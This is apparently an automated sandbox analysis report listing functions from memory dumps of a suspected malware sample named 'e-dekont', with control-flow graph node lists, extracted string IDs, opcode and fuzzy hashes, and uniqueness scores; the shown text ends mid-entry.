                                                        control_flow_graph 770 2dcc7b1-2dcc7b8 771 2dcc73d-2dcc74b 770->771 772 2dcc7ba-2dcc7e0 770->772 771->770 773 2dcc7e7-2dcc82f 772->773 774 2dcc7e2 772->774 778 2dcc837-2dcc846 call 2dc3960 773->778 774->773 781 2dcc84b-2dcc8c4 call 2dc3480 778->781 787 2dcc8cb-2dcc8ec call 2dc4e20 781->787 788 2dcc8c6 781->788 790 2dcc8f1-2dcc8fc 787->790 788->787 791 2dcc8fe 790->791 792 2dcc903-2dcc907 790->792 791->792 793 2dcc90c-2dcc913 792->793 794 2dcc909-2dcc90a 792->794 796 2dcc91a-2dcc928 793->796 797 2dcc915 793->797 795 2dcc92b-2dcc96f 794->795 801 2dcc9d5-2dcc9ec 795->801 796->795 797->796 803 2dcc9ee-2dcca13 801->803 804 2dcc971-2dcc987 801->804 810 2dcca2b 803->810 811 2dcca15-2dcca2a 803->811 808 2dcc989-2dcc995 804->808 809 2dcc9b1 804->809 812 2dcc99f-2dcc9a5 808->812 813 2dcc997-2dcc99d 808->813 814 2dcc9b7-2dcc9d4 809->814 811->810 815 2dcc9af 812->815 813->815 814->801 815->814
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 180c31410440dfeb73506c31c1006ac0e0aacadf4119dcd739e459d48f1fda04
                                                        • Instruction ID: 85db2e7b80bb7a1e711828a0e87da31e287b1b4fe60dbf0fa8ca4259bfdb879e
                                                        • Opcode Fuzzy Hash: 180c31410440dfeb73506c31c1006ac0e0aacadf4119dcd739e459d48f1fda04
                                                        • Instruction Fuzzy Hash: A681B674E10219DFDB18DFA9D994A9DBBF2BF88300F24806AE509AB365DB349D41CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCC4D0 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 819 2dcc4d0-2dcc4d4 820 2dcc456-2dcc45e 819->820 821 2dcc4d6-2dcc500 819->821 822 2dcc507-2dcc5e4 call 2dc3960 call 2dc3480 821->822 823 2dcc502 821->823 833 2dcc5eb-2dcc61c call 2dc4e20 822->833 834 2dcc5e6 822->834 823->822 837 2dcc61e 833->837 838 2dcc623-2dcc627 833->838 834->833 837->838 839 2dcc62c-2dcc633 838->839 840 2dcc629-2dcc62a 838->840 842 2dcc63a-2dcc648 839->842 843 2dcc635 839->843 841 2dcc64b-2dcc68f 840->841 847 2dcc6f5-2dcc70c 841->847 842->841 843->842 849 2dcc70e-2dcc733 847->849 850 2dcc691-2dcc6a7 847->850 857 2dcc74b-2dcc7b8 849->857 858 2dcc735-2dcc738 849->858 854 2dcc6a9-2dcc6b5 850->854 855 2dcc6d1 850->855 859 2dcc6bf-2dcc6c5 854->859 860 2dcc6b7-2dcc6bd 854->860 856 2dcc6d7-2dcc6f4 855->856 856->847 862 2dcc73d-2dcc74a 857->862 865 2dcc7ba-2dcc7e0 857->865 858->862 861 2dcc6cf 859->861 860->861 861->856 862->857 867 2dcc7e7-2dcc8c4 call 2dc3960 call 2dc3480 865->867 868 2dcc7e2 865->868 879 2dcc8cb-2dcc8ec call 2dc4e20 867->879 880 2dcc8c6 867->880 868->867 882 2dcc8f1-2dcc8fc 879->882 880->879 883 2dcc8fe 882->883 884 2dcc903-2dcc907 882->884 883->884 885 2dcc90c-2dcc913 884->885 886 2dcc909-2dcc90a 884->886 888 2dcc91a-2dcc928 885->888 889 2dcc915 885->889 887 2dcc92b-2dcc96f 886->887 893 2dcc9d5-2dcc9ec 887->893 888->887 889->888 895 2dcc9ee-2dcca13 893->895 896 2dcc971-2dcc987 893->896 902 2dcca2b 895->902 903 2dcca15-2dcca2a 895->903 900 2dcc989-2dcc995 896->900 901 2dcc9b1 896->901 904 2dcc99f-2dcc9a5 900->904 905 2dcc997-2dcc99d 900->905 906 2dcc9b7-2dcc9d4 901->906 903->902 907 2dcc9af 904->907 905->907 906->893 907->906
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: e7c601bc64f7f730af2c6776255cb76d5ba38d317893df025c52bc28c2410fc1
                                                        • Instruction ID: 9507adaada7a17cefa850bf329af8b4cb2100281b37e456587059c05d1ad2233
                                                        • Opcode Fuzzy Hash: e7c601bc64f7f730af2c6776255cb76d5ba38d317893df025c52bc28c2410fc1
                                                        • Instruction Fuzzy Hash: E981C574E10249DFDB14DFA9D984A9DBBF2BF88300F24D06AE509AB365DB349841CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCBF10 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 911 2dcbf10-2dcbf11 912 2dcbef9 911->912 913 2dcbf13-2dcbf15 911->913 914 2dcbefd-2dcbf02 912->914 913->914 915 2dcbf17-2dcbf40 913->915 916 2dcbf47-2dcc024 call 2dc3960 call 2dc3480 915->916 917 2dcbf42 915->917 927 2dcc02b-2dcc04c call 2dc4e20 916->927 928 2dcc026 916->928 917->916 930 2dcc051-2dcc05c 927->930 928->927 931 2dcc05e 930->931 932 2dcc063-2dcc067 930->932 931->932 933 2dcc06c-2dcc073 932->933 934 2dcc069-2dcc06a 932->934 936 2dcc07a-2dcc088 933->936 937 2dcc075 933->937 935 2dcc08b-2dcc0cf 934->935 941 2dcc135-2dcc14c 935->941 936->935 937->936 943 2dcc14e-2dcc173 941->943 944 2dcc0d1-2dcc0e7 941->944 953 2dcc18b 943->953 954 2dcc175-2dcc18a 943->954 948 2dcc0e9-2dcc0f5 944->948 949 2dcc111 944->949 950 2dcc0ff-2dcc105 948->950 951 2dcc0f7-2dcc0fd 948->951 952 2dcc117-2dcc134 949->952 955 2dcc10f 950->955 951->955 952->941 954->953 955->952
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 67b59375ce7875dde472d94b900da595965336843121ecf8b54be133843968a1
                                                        • Instruction ID: 7afa863be38fb570ac8315ddb0ee5711671c66fe6ff84d3a788217334b68ac7d
                                                        • Opcode Fuzzy Hash: 67b59375ce7875dde472d94b900da595965336843121ecf8b54be133843968a1
                                                        • Instruction Fuzzy Hash: AD81B774E00209DFDB14DFAAD994A9DBBF2BF88310F24C06AE509AB365DB349941CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCBC32 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 959 2dcbc32-2dcbc35 960 2dcbc1d 959->960 961 2dcbc37-2dcbc39 959->961 962 2dcbc3b-2dcbc60 961->962 963 2dcbc21-2dcbc22 961->963 964 2dcbc67-2dcbd44 call 2dc3960 call 2dc3480 962->964 965 2dcbc62 962->965 975 2dcbd4b-2dcbd6c call 2dc4e20 964->975 976 2dcbd46 964->976 965->964 978 2dcbd71-2dcbd7c 975->978 976->975 979 2dcbd7e 978->979 980 2dcbd83-2dcbd87 978->980 979->980 981 2dcbd8c-2dcbd93 980->981 982 2dcbd89-2dcbd8a 980->982 984 2dcbd9a-2dcbda8 981->984 985 2dcbd95 981->985 983 2dcbdab-2dcbdef 982->983 989 2dcbe55-2dcbe6c 983->989 984->983 985->984 991 2dcbe6e-2dcbe93 989->991 992 2dcbdf1-2dcbe07 989->992 999 2dcbeab 991->999 1000 2dcbe95-2dcbeaa 991->1000 996 2dcbe09-2dcbe15 992->996 997 2dcbe31 992->997 1001 2dcbe1f-2dcbe25 996->1001 1002 2dcbe17-2dcbe1d 996->1002 998 2dcbe37-2dcbe54 997->998 998->989 1000->999 1003 2dcbe2f 1001->1003 1002->1003 1003->998
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: afe4d13357ac5989702cf8d2cac22e6a0a249d8923294c5db960ce819bb56d12
                                                        • Instruction ID: 670b5102e10e49106b2c064cf02c8886348c59845c37cd4044a56f81d6653bc8
                                                        • Opcode Fuzzy Hash: afe4d13357ac5989702cf8d2cac22e6a0a249d8923294c5db960ce819bb56d12
                                                        • Instruction Fuzzy Hash: A081A874E00219DFDB54DFA9D984A9DBBF2BF88304F24806AD409AB365DB359941CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCC1F0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1007 2dcc1f0-2dcc1f5 1008 2dcc1dd-2dcc1e2 1007->1008 1009 2dcc1f7-2dcc220 1007->1009 1010 2dcc227-2dcc304 call 2dc3960 call 2dc3480 1009->1010 1011 2dcc222 1009->1011 1021 2dcc30b-2dcc32c call 2dc4e20 1010->1021 1022 2dcc306 1010->1022 1011->1010 1024 2dcc331-2dcc33c 1021->1024 1022->1021 1025 2dcc33e 1024->1025 1026 2dcc343-2dcc347 1024->1026 1025->1026 1027 2dcc34c-2dcc353 1026->1027 1028 2dcc349-2dcc34a 1026->1028 1030 2dcc35a-2dcc368 1027->1030 1031 2dcc355 1027->1031 1029 2dcc36b-2dcc3af 1028->1029 1035 2dcc415-2dcc42c 1029->1035 1030->1029 1031->1030 1037 2dcc42e-2dcc453 1035->1037 1038 2dcc3b1-2dcc3c7 1035->1038 1044 2dcc46b 1037->1044 1045 2dcc455-2dcc46a 1037->1045 1042 2dcc3c9-2dcc3d5 1038->1042 1043 2dcc3f1 1038->1043 1046 2dcc3df-2dcc3e5 1042->1046 1047 2dcc3d7-2dcc3dd 1042->1047 1048 2dcc3f7-2dcc414 1043->1048 1045->1044 1049 2dcc3ef 1046->1049 1047->1049 1048->1035 1049->1048
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: e0c65be0b6ed0a5cbe7358021647c5027f72340fc186b50ad4cb3af48161790f
                                                        • Instruction ID: 2db4f2308d91505b316c121c249505502f56495e6f2c4cb2dc7da5a88d092cb6
                                                        • Opcode Fuzzy Hash: e0c65be0b6ed0a5cbe7358021647c5027f72340fc186b50ad4cb3af48161790f
                                                        • Instruction Fuzzy Hash: 8681A374E10209DFDB14DFAAD994A9DBBF2BF88300F24C06AE549AB365DB349941CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC4B31 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1053 2dc4b31-2dc4b60 1054 2dc4b67-2dc4c44 call 2dc3960 call 2dc3480 1053->1054 1055 2dc4b62 1053->1055 1065 2dc4c4b-2dc4c69 1054->1065 1066 2dc4c46 1054->1066 1055->1054 1096 2dc4c6c call 2dc4e20 1065->1096 1097 2dc4c6c call 2dc4e11 1065->1097 1066->1065 1067 2dc4c72-2dc4c7d 1068 2dc4c7f 1067->1068 1069 2dc4c84-2dc4c88 1067->1069 1068->1069 1070 2dc4c8d-2dc4c94 1069->1070 1071 2dc4c8a-2dc4c8b 1069->1071 1073 2dc4c9b-2dc4ca9 1070->1073 1074 2dc4c96 1070->1074 1072 2dc4cac-2dc4cf0 1071->1072 1078 2dc4d56-2dc4d6d 1072->1078 1073->1072 1074->1073 1080 2dc4d6f-2dc4d94 1078->1080 1081 2dc4cf2-2dc4d08 1078->1081 1088 2dc4dac 1080->1088 1089 2dc4d96-2dc4dab 1080->1089 1085 2dc4d0a-2dc4d16 1081->1085 1086 2dc4d32 1081->1086 1090 2dc4d18-2dc4d1e 1085->1090 1091 2dc4d20-2dc4d26 1085->1091 1087 2dc4d38-2dc4d55 1086->1087 1087->1078 1089->1088 1092 2dc4d30 1090->1092 1091->1092 1092->1087 1096->1067 1097->1067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 1f0487fb097c9c0baa1c4535dcc1be6a77c441292897899739d8095c4b224efb
                                                        • Instruction ID: cd072ec6b87757c98ad8852ba9a0aec6fd1d9ef68025b8e7a86bb7297bf8c984
                                                        • Opcode Fuzzy Hash: 1f0487fb097c9c0baa1c4535dcc1be6a77c441292897899739d8095c4b224efb
                                                        • Instruction Fuzzy Hash: 9A81A674E00219DFDB54DFA9D994A9DBBF2BF88300F24C069E809AB365DB349981CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCCA91 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1098 2dcca91-2dccac0 1099 2dccac7-2dccba4 call 2dc3960 call 2dc3480 1098->1099 1100 2dccac2 1098->1100 1110 2dccbab-2dccbcc call 2dc4e20 1099->1110 1111 2dccba6 1099->1111 1100->1099 1113 2dccbd1-2dccbdc 1110->1113 1111->1110 1114 2dccbde 1113->1114 1115 2dccbe3-2dccbe7 1113->1115 1114->1115 1116 2dccbec-2dccbf3 1115->1116 1117 2dccbe9-2dccbea 1115->1117 1119 2dccbfa-2dccc08 1116->1119 1120 2dccbf5 1116->1120 1118 2dccc0b-2dccc4f 1117->1118 1124 2dcccb5-2dccccc 1118->1124 1119->1118 1120->1119 1126 2dcccce-2dcccf3 1124->1126 1127 2dccc51-2dccc67 1124->1127 1133 2dccd0b 1126->1133 1134 2dcccf5-2dccd0a 1126->1134 1131 2dccc69-2dccc75 1127->1131 1132 2dccc91 1127->1132 1135 2dccc7f-2dccc85 1131->1135 1136 2dccc77-2dccc7d 1131->1136 1137 2dccc97-2dcccb4 1132->1137 1134->1133 1138 2dccc8f 1135->1138 1136->1138 1137->1124 1138->1137
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: d0cc945e032e86d8919f3071043e1320e242fe234c1bd6ef291c8c3c0a6cb4aa
                                                        • Instruction ID: e398b4f9a9e497ad664ec23692ad53f0a5dd32e9b6c98bf36628a3b5a58c179f
                                                        • Opcode Fuzzy Hash: d0cc945e032e86d8919f3071043e1320e242fe234c1bd6ef291c8c3c0a6cb4aa
                                                        • Instruction Fuzzy Hash: 9A81B774E002199FDB54DFA9D984A9DBBF2BF88300F24C06AE809AB365DB349D41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC6790 Relevance: 5.4, Strings: 4, Instructions: 444COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1260 2dc6790-2dc67c6 1387 2dc67c8 call 2dc6168 1260->1387 1388 2dc67c8 call 2dc6790 1260->1388 1389 2dc67c8 call 2dc68e0 1260->1389 1261 2dc67ce-2dc67d4 1262 2dc6824-2dc6828 1261->1262 1263 2dc67d6-2dc67da 1261->1263 1266 2dc683f-2dc6853 1262->1266 1267 2dc682a-2dc6839 1262->1267 1264 2dc67dc-2dc67e1 1263->1264 1265 2dc67e9-2dc67f0 1263->1265 1264->1265 1271 2dc68c6-2dc6903 1265->1271 1272 2dc67f6-2dc67fd 1265->1272 1270 2dc685b-2dc6862 1266->1270 1384 2dc6855 call 2dc98b8 1266->1384 1385 2dc6855 call 2dc98b1 1266->1385 1268 2dc683b-2dc683d 1267->1268 1269 2dc6865-2dc686f 1267->1269 1268->1270 1273 2dc6879-2dc687d 1269->1273 1274 2dc6871-2dc6877 1269->1274 1281 2dc690e-2dc692e 1271->1281 1282 2dc6905-2dc690b 1271->1282 1272->1262 1275 2dc67ff-2dc6803 1272->1275 1276 2dc6885-2dc68bf 1273->1276 1278 2dc687f 1273->1278 1274->1276 1279 2dc6805-2dc680a 1275->1279 1280 2dc6812-2dc6819 1275->1280 1276->1271 1278->1276 1279->1280 1280->1271 1283 2dc681f-2dc6822 1280->1283 1288 2dc6935-2dc693c 1281->1288 1289 2dc6930 1281->1289 1282->1281 1283->1270 1292 2dc693e-2dc6949 1288->1292 1291 2dc6cc4-2dc6ccd 1289->1291 1293 2dc694f-2dc6962 1292->1293 1294 2dc6cd5-2dc6cea 1292->1294 1299 2dc6978-2dc6993 1293->1299 1300 2dc6964-2dc6972 1293->1300 1304 2dc6995-2dc699b 1299->1304 1305 2dc69b7-2dc69ba 1299->1305 1300->1299 1303 2dc6c4c-2dc6c53 1300->1303 1303->1291 1308 2dc6c55-2dc6c57 1303->1308 1306 2dc699d 1304->1306 1307 2dc69a4-2dc69a7 1304->1307 1309 2dc6b14-2dc6b1a 1305->1309 1310 2dc69c0-2dc69c3 1305->1310 1306->1307 1306->1309 1312 2dc69da-2dc69e0 1306->1312 1313 2dc6c06-2dc6c09 1306->1313 1307->1312 1314 2dc69a9-2dc69ac 1307->1314 1315 2dc6c59-2dc6c5e 1308->1315 1316 2dc6c66-2dc6c6c 1308->1316 1309->1313 1317 2dc6b20-2dc6b25 1309->1317 1310->1309 1311 2dc69c9-2dc69cf 1310->1311 1311->1309 1318 2dc69d5 1311->1318 1319 2dc69e6-2dc69e8 1312->1319 1320 2dc69e2-2dc69e4 1312->1320 1321 2dc6c0f-2dc6c15 1313->1321 1322 2dc6cd0 1313->1322 1323 2dc6a46-2dc6a4c 1314->1323 1324 2dc69b2 1314->1324 1315->1316 1316->1294 1325 2dc6c6e-2dc6c73 1316->1325 1317->1313 1318->1313 1329 2dc69f2-2dc69fb 1319->1329 1320->1329 1330 2dc6c3a-2dc6c3e 1321->1330 1331 2dc6c17-2dc6c1f 1321->1331 1322->1294 1323->1313 1328 2dc6a52-2dc6a58 1323->1328 1324->1313 1326 2dc6cb8-2dc6cbb 1325->1326 1327 2dc6c75-2dc6c7a 1325->1327 1326->1322 1339 2dc6cbd-2dc6cc2 1326->1339 1327->1322 1332 2dc6c7c 1327->1332 1333 2dc6a5e-2dc6a60 1328->1333 1334 2dc6a5a-2dc6a5c 1328->1334 1336 2dc69fd-2dc6a08 1329->1336 1337 2dc6a0e-2dc6a36 1329->1337 1330->1303 1338 2dc6c40-2dc6c46 1330->1338 1331->1294 1335 2dc6c25-2dc6c34 1331->1335 1340 2dc6c83-2dc6c88 1332->1340 1341 2dc6a6a-2dc6a81 1333->1341 1334->1341 1335->1299 1335->1330 1336->1313 1336->1337 1359 2dc6a3c-2dc6a41 1337->1359 1360 2dc6b2a-2dc6b60 1337->1360 1338->1292 1338->1303 1339->1291 1339->1308 1342 2dc6caa-2dc6cac 1340->1342 1343 2dc6c8a-2dc6c8c 1340->1343 1352 2dc6aac-2dc6ad3 1341->1352 1353 2dc6a83-2dc6a9c 1341->1353 1342->1322 1350 2dc6cae-2dc6cb1 1342->1350 1347 2dc6c8e-2dc6c93 1343->1347 1348 2dc6c9b-2dc6ca1 1343->1348 1347->1348 1348->1294 1351 2dc6ca3-2dc6ca8 1348->1351 1350->1326 1351->1342 1355 2dc6c7e-2dc6c81 1351->1355 1352->1322 1364 2dc6ad9-2dc6adc 1352->1364 1353->1360 1365 2dc6aa2-2dc6aa7 1353->1365 1355->1322 1355->1340 1359->1360 1366 2dc6b6d-2dc6b75 1360->1366 1367 2dc6b62-2dc6b66 1360->1367 1364->1322 1368 2dc6ae2-2dc6b0b 1364->1368 1365->1360 1366->1322 1371 2dc6b7b-2dc6b80 1366->1371 1369 2dc6b68-2dc6b6b 1367->1369 1370 2dc6b85-2dc6b89 1367->1370 1368->1360 1383 2dc6b0d-2dc6b12 1368->1383 1369->1366 1369->1370 1372 2dc6ba8-2dc6bac 1370->1372 1373 2dc6b8b-2dc6b91 1370->1373 1371->1313 1376 2dc6bae-2dc6bb4 1372->1376 1377 2dc6bb6-2dc6bd5 call 2dc6eb8 1372->1377 1373->1372 1375 2dc6b93-2dc6b9b 1373->1375 1375->1322 1378 2dc6ba1-2dc6ba6 1375->1378 1376->1377 1380 2dc6bdb-2dc6bdf 1376->1380 1377->1380 1378->1313 1380->1313 1381 2dc6be1-2dc6bfd 1380->1381 1381->1313 1383->1360 1384->1270 1385->1270 1387->1261 1388->1261 1389->1261
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$,bq$,bq
                                                        • API String ID: 0-879173519
                                                        • Opcode ID: b80aeeb17a01478440f7d49452b7acd53a231698961b99c2055f03082b569cce
                                                        • Instruction ID: 5e412e3ab7e63c84ee2f7a74a34469c63985df7a05e51e505231543ac3ef69f9
                                                        • Opcode Fuzzy Hash: b80aeeb17a01478440f7d49452b7acd53a231698961b99c2055f03082b569cce
                                                        • Instruction Fuzzy Hash: 98020B71A0011ADFCB14DF69C984AADBBFAFF88304F258469E455AB3A1D730DD45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCB552 Relevance: 3.9, Strings: 3, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$PH^q$PH^q
                                                        • API String ID: 0-4194141968
                                                        • Opcode ID: bbafb0da93ab1fb43fe553a5a2f97649bf68f7ec462f80401da900d143d9deee
                                                        • Instruction ID: 678322c3a62f84d28baa114d290dc86c7a662a482f114dd2310e8e37d370ce69
                                                        • Opcode Fuzzy Hash: bbafb0da93ab1fb43fe553a5a2f97649bf68f7ec462f80401da900d143d9deee
                                                        • Instruction Fuzzy Hash: 9161C874E006499FDB18DFAAD984A9DBBF2FF88304F24C06AD815AB365DB349841CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC98B8 Relevance: 3.4, Strings: 2, Instructions: 860COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$4'^q
                                                        • API String ID: 0-273632683
                                                        • Opcode ID: 6425d4c403c77543ea64474012f7e56f1d849e1e3f39d12950e9ef306c880071
                                                        • Instruction ID: 0f1e0da6013db3e6efae1dbbd55d72e48c05c35eb26464b394f9409388eef7ff
                                                        • Opcode Fuzzy Hash: 6425d4c403c77543ea64474012f7e56f1d849e1e3f39d12950e9ef306c880071
                                                        • Instruction Fuzzy Hash: 9E72AC70A0021ADFCB15CFA8C994AAEBBF2FF89310F258559E8459B3A5D731EC51CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC6168 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$Hbq
                                                        • API String ID: 0-662517225
                                                        • Opcode ID: a04f122cd77895e6043fc6830124a7da424839e8f07b43c577efaf454eafdfb8
                                                        • Instruction ID: 391f55ae6d2c525a007f43f8eb13240852c56ea61e8a50b79f170fd7cac50099
                                                        • Opcode Fuzzy Hash: a04f122cd77895e6043fc6830124a7da424839e8f07b43c577efaf454eafdfb8
                                                        • Instruction Fuzzy Hash: 49128C70A0021A8FDB14DF69C894AAEBBFABFC8304F24856DE5459B395DB34DC41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C09091 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: f367fcc40e0bc7eae142a4df1c1e62d98fbe3d60324c004369a30c9994ba9237
                                                        • Instruction ID: 3df0314322802e0f16e4968e501e29af2e3f37bca2b3e4e149b2a36a3f20242f
                                                        • Opcode Fuzzy Hash: f367fcc40e0bc7eae142a4df1c1e62d98fbe3d60324c004369a30c9994ba9237
                                                        • Instruction Fuzzy Hash: 5881E274E04218CFEB58CFAAD9947EDBBF2BF89300F20916AD409AB295DB345945CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B489B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce5096e68e74a07685b74dc67a1699c8dcddf608247dbb2fe85c62c409ac18a7
                                                        • Instruction ID: a5073c7692d940b8571b93681ec9678a9c88fbfb54476793e499f0fbd5f3e8c5
                                                        • Opcode Fuzzy Hash: ce5096e68e74a07685b74dc67a1699c8dcddf608247dbb2fe85c62c409ac18a7
                                                        • Instruction Fuzzy Hash: 16F1F474E01218DFDB24DFA9D884B9DBBB2BF88304F14C1A9E408AB355DB75A985CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4BE28 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 33089aad69faadcea4950514c90d1b58f979e79f0c870124b1f55ad99cb2f14c
                                                        • Instruction ID: 63ccf5863897cd160574f925411d610fa05d5f36fb08f9a48ef2b30627f2cd69
